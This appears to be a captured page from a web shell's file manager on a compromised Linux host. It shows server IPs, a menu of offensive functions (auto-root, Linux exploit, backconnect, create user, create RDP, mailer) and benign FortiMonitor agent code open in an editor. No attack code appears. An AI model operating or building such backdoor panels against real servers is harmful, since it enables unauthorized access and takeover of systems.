Linux 120.141.167.72.host.secureserver.net 4.18.0-553.150.1.el8_10.x86_64 #1 SMP Fri Jul 31 15:23:31 EDT 2026 x86_64
Apache
: 72.167.141.120 | : 216.73.217.14
808 Domain
7.4.33
bestseocompany
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
bin /
fm-agent /
[ HOME SHELL ]
Name
Size
Permission
Action
countermeasure.py
2.99
KB
-rwxr-xr-x
fm_agent.py
3.75
KB
-rwxr-xr-x
fm_agent_noroot.py
1.29
KB
-rw-r--r--
maintenance.py
1.91
KB
-rwxr-xr-x
maintenance_noroot.py
1.91
KB
-rwxr-xr-x
register.py
1.32
KB
-rw-r--r--
report.py
1.91
KB
-rw-r--r--
update_config.py
1.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : register.py
import fcntl import time import sys import os, os.path import csv if "freebsd" in sys.platform.lower(): register_file = "/usr/local/fm-agent/lib/register" elif "darwin" == sys.platform.lower(): register_file = "/usr/local/FortiMonitor/agent/share/fm-agent/register" else: register_file = "/var/lib/fm-agent/register" if not os.path.exists(register_file): home = os.path.expanduser("~") register_file = os.path.join(home, "lib", "fm-agent", "register") unlock_attempts = 10 def register_metric(textkey, description): csvfile = open(register_file, "a") # Acquire lock locked = True for i in range(unlock_attempts): try: fcntl.flock(csvfile, fcntl.LOCK_EX | fcntl.LOCK_NB) locked = False break except: time.sleep(1.0) if locked: print( "Could not unlock %s after %s attempts" % (register_file, unlock_attempts) ) sys.exit(1) # Append new metrics csvwriter = csv.writer(csvfile) csvwriter.writerow([textkey, description]) # Release lock fcntl.flock(csvfile, fcntl.LOCK_UN) csvfile.close() if __name__ == "__main__": if len(sys.argv) < 3: print("Please specify textkey and description") sys.exit(0) else: register_metric(sys.argv[1], sys.argv[2])
Close